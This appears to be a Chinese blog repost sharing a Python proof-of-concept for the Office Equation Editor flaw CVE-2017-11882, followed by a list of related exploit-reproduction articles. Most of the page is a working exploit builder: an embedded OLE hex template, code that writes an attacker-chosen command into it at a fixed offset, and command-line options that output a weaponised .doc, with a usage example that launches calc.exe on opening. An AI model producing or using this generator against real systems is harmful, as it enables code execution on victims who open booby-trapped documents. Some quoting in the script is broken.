2. 程式人生 > >Office--CVE-2017-11882【遠程代碼執行】

Office--CVE-2017-11882【遠程代碼執行】

阿新 發佈:2017-11-23
== nbsp content trail pic rim argparse .cn from

Office遠程代碼執行漏洞現POC樣本

最近這段時間CVE-2017-11882挺火的。關於這個漏洞可以看看這裏:https://www.77169.com/html/186186.html

今天在twitter上看到有人共享了一個POC,https://twitter.com/gossithedog/status/932694287480913920,http://owned.lab6.com/%7Egossi/research/public/cve-2017-11882/,後來又看到有人共享了一個項目https://github.com/embedi/CVE-2017-11882,簡單看了一下這個項目,通過對rtf文件的修改來實現命令執行的目的,但是有個缺陷就是,這個項目使用的是使用webdav的方式來執行遠程文件的,使用起來可能並不容易,所以就對此文件進行了簡單的修改,具體項目地址如下:

POC地址:https://github.com/Ridter/CVE-2017-11882/

POC源碼如下:

  1 import argparse
  2 import sys
  3 
  4 
  5 RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
  6 {\*\generator Riched20 6.3.9600}\viewkind4\uc1
  7 \pard\sa200\sl276\slmult1\f0\fs22\lang9"""
  8
 
 
  9 
 10 RTF_TRAILER = R"""\par}
 11 """
 12 
 13 
 14 OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """
 15 
 16 
 17 OBJECT_TRAILER = R"""
 18 }{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}

 
 19 {\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}
 20 {\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}
 21 {\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0
 22 \picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02
 23 00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}
 24 """
 25 
 26 
 27 OBJDATA_TEMPLATE = R"""
 28 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
 29 b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
 30 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
 31 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 32 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 33 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 34 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 35 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 36 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 37 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 38 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 39 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 40 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 41 fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
 42 fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 43 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 44 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 45 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 46 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 47 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 48 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 49 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 50 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 51 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 52 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 53 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 54 ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
 55 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 56 00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
 57 000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
 58 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 59 00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
 60 0000000000000000000000000000000000000000000000000000001400000000000000010043006f
 61 006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
 62 00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
 63 00000000000000000000000000000000000000000000000000000000000000010000006600000000
 64 00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
 65 00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
 66 ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
 67 0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
 68 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 69 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 70 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 71 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 72 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 73 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 74 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 75 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 76 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 77 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 78 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 79 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 80 ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
 81 0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
 82 ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
 83 30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
 84 00000000000000000000000000000000000000000000000000000000000000000000000000030004
 85 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 86 000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
 87 ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141
 88 414141414141414141414141414141414141414141120c4300000000000000000000000000000000
 89 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 90 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 91 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 92 00000000000000000000000000000000000000000000000000000000000000000000004500710075
 93 006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
 94 0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
 95 0000000000000000000000000000000000000000000000000000000000000004000000c500000000
 96 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 97 00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
 98 ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
 99 00000000000000000000000000000000000000000000000000000000000000000000000000000000
100 000000000000000000000000000000000000000000000000000000000000000000000000000000ff
101 ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
102 00000000000000000000000000000000000000000000000000000000000000000000000000000000
103 00000000000000000000000000000000000000000000000000000000000000000000000000000000
104 00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
105 00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
106 45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
107 000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
108 050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
109 ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
110 54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
111 7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
112 90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
113 0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
114 31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
115 0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
116 7cef1800040000002d01010004000000f0010000030000000000
117 """
118 
119 
120 COMMAND_OFFSET = 0x949*2
121 
122 
123 def create_ole_exec_primitive(command):
124     if len(command) > 43:
125         print "[!] Primitive command must be shorter than 43 bytes"
126         sys.exit(0)
127     hex_command = command.encode("hex")
128     objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")
129     ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]
130     return OBJECT_HEADER + ole_data + OBJECT_TRAILER
131 
132 
133 
134 def create_rtf(header,command,trailer):
135     ole1 = create_ole_exec_primitive(command + " &")
136     
137     # We need 2 or more commands for executing remote file from WebDAV
138     # because WebClient service start may take some time
139     return header + ole1 + trailer
140 
141 
142 
143 if __name__ == __main__:
144     parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
145     parser.add_argument("-c", "--command", help="Command to execute.", required=True)
146     parser.add_argument(-o, "--output", help="Output exploit rtf", required=True)
147 
148     args = parser.parse_args()
149 
150     rtf_content = create_rtf(RTF_HEADER, args.command ,RTF_TRAILER)
151     
152     output_file = open(args.output, "w")
153     output_file.write(rtf_content)
154 
155 print "[*] Done ! output file --> " + args.output

使用方式很簡單,如果要執行命令:

python python.py -c "cmd.exe /c calc.exe" -o 1.doc,則:

技術分享圖片

那麽相應地生成了1.doc文件:當我打開1.doc的時候 會提示如下信息:

技術分享圖片

點擊允許之後:

技術分享圖片

就會自動調用計算器,關於進一步的漏洞利用,還需要各位大佬指點,非常感謝!!!

Office--CVE-2017-11882【遠程代碼執行】

相關推薦

Office--CVE-2017-11882執行

== nbsp content trail pic rim argparse .cn from Office遠程代碼執行漏洞現POC樣本 最近這段時間CVE-2017-11882挺火的。關於這個漏洞可以看看這裏:https://www.77169.com/html/1861

隱藏17年的Office執行漏洞(CVE-2017-11882

portal round splay avi uid windows 1.10 分享 ret Preface   這幾天關於Office的一個遠程代碼執行漏洞很流行,昨天也有朋友發了相關信息,於是想復現一下看看,復現過程也比較簡單,主要是簡單記錄下。   利用腳本Git

Office執行漏洞CVE-2017-0199復現

read 方式 觀察 data n3k -s 執行 rip 最大限度 在剛剛結束的BlackHat2017黑帽大會上,最佳客戶端安全漏洞獎頒給了CVE-2017-0199漏洞,這個漏洞是Office系列辦公軟件中的一個邏輯漏洞,和常規的內存破壞型漏洞不同,這

Office CVE-2017-8570執行漏洞復現

pytho pack root 一個 strong -o 激活 meta 相同 實驗環境 操作機:Kali Linux IP:172.16.11.2 目標機:windows7 x64 IP:172.16.12.2 實驗目的 掌握漏洞的利用方法 實驗

Office CVE-2017-8570 執行漏洞復現

CVE-2017-8570 Office 遠程代碼執行 最近在學習kali的相關使用,朋友說不如就復現cve-2017-8570吧,我欣然答應。 0x00介紹CVE-2017-8570是一個邏輯漏洞,成因是Microsoft PowerPoint執行時會初始化“script”Moniker對象,

LNK文件(快捷方式)執行漏洞復現過程(CVE-2017-8464)

abi cred starting compute appear pda info 等級 server 漏洞編號:CVE-2017-8464 漏洞等級:嚴重 漏洞概要:如果用戶打開攻擊者精心構造的惡意LNK文件,則會造成遠程代碼執行。成功利用此漏洞的攻擊者可以獲得與本地

Microsoft Edge 瀏覽器執行漏洞POC及細節(CVE-2017-8641)

ive buffer png serer virt pil binding nproc mil 2017年8月8日,CVE官網公布了CVE-2017-8641,在其網上的描述為: 意思是說,黑客可以通過在網頁中嵌入惡意構造的javascript代碼,使得微軟的瀏覽器(如E

Apache Tomcat CVE-2017-12615執行漏洞分析

文件 only html ive zip pre clas one 判斷 2017年9月19日, Apache Tomcat官方發布兩個嚴重的安全漏洞, 其中CVE-2017-12615為遠程代碼執行漏洞,通過put請求向服務器上傳惡意jsp文件, 再通過jsp文件在服

Samba執行漏洞(CVE-2017-7494)復現

one hub 4.6 修改配置 自己 tree bpa wid 找到   簡要記錄一下Samba遠程代碼執行漏洞(CVE-2017-7494)環境搭建和利用的過程,獻給那些想自己動手搭建環境的朋友。(雖然已過多時)   快捷通道:Docker ~ Samba遠程代碼

Samba執行漏洞(CVE-2017-7494) 復現

51cto ucc 協議 samba配置文件 finished arc tin epo type 漏洞背景:Samba是在Linux和UNIX系統上實現SMB協議的一個軟件,2017年5月24日Samba發布了4.6.4版本,中間修復了一個嚴重的遠程代碼執行漏洞,漏洞編號C

[工具]Tomcat CVE-2017-12615 執行

win 博客 work frame pan cat .com toc 文件 工具: K8_TocmatExp編譯: VS2012 C# (.NET Framework v2.0)組織: K8搞基大隊[K8team]作者: K8拉登哥哥博客: http://qqhack8.

PHPMailer < 5.2.18 執行漏洞(CVE-2016-10033)

com ifconf github cnblogs grep main src avi https PHPMailer < 5.2.18 Remote Code Execution    本文將簡單展示一下PHPMailer遠程代碼執行漏洞(CVE-2016-100

WebLogic 任意文件上傳 執行漏洞 (CVE-2018-2894)------->>>任意文件上傳檢測POC

htm input ade print out vcg exc ops 上傳 前言: Oracle官方發布了7月份的關鍵補丁更新CPU(Critical Patch Update),其中針對可造成遠程代碼執行的高危漏洞 CVE-2018-2894 進行修復: http:

Nexus Repository Manager 3(CVE-2019-7238) 執行漏洞分析和復現

下載鏈接 例子 conf bash 動態 本地 簡單的 article detail 0x00 漏洞背景 Nexus Repository Manager 3是一款軟件倉庫,可以用來存儲和分發Maven,NuGET等軟件源倉庫。其3.14.0及之前版本中,存在一處基於Or

Chrome 執行漏洞CVE-2019-5786-EXP

代碼執行 一個 art eas 避免 返回 class 參考 release 0x01 漏洞原理 CVE-2019-5786是位於FileReader中的UAF漏洞,由Google’s Threat Analysis Group的Clement Lecigne於2019-0

Jenkins執行漏洞

查看 過程 com 漏洞 all 用戶 運行 最新 style 於一個月前,進行服務器巡檢時,發現服務器存在不明進程,並且以Jenkins用戶身份來運行.當時進行了處理並修復了漏洞.在此補上修復過程 第一反應是Jenkins存在漏洞,於是Google Jenkins漏洞,瞬

http.sys執行漏洞(MS15-034)

bsp 描述 style windows zh-cn port c代碼 win pan 0x01漏洞描述 遠程執行代碼漏洞存在於 HTTP 協議堆棧 (HTTP.sys) 中,當 HTTP.sys 未正確分析經特殊設計的 HTTP 請求時會導致此漏洞。成功利用此漏洞的攻擊者

OrientDB執行漏洞利用與分析

orientdb遠程代碼執行漏洞利用與分析原文見:http://zhuanlan.51cto.com/art/201708/548641.htm本文出自 “simeon技術專欄” 博客,請務必保留此出處http://simeon.blog.51cto.com/18680/1958277OrientDB遠程代碼

Apache ActiveMQ Fileserver執行漏洞

.org tail 自己 run reader 一句話 遠程 ring 成功   掃端口的時候遇到8161端口,輸入admin/admin,成功登陸,之前就看到過相關文章,PUT了一句話上去,但是沒有什麽效果,於是本地搭建了一個環境,記錄一下測試過程。 環境搭建: Acti

漏洞復現:Struts2 執行漏洞(S2-033)

res 3par alt param amp lan post pull struts docker pull medicean/vulapps:s_struts2_s2-033 docker run -d -p 80:8080 medicean/vulapps:s_str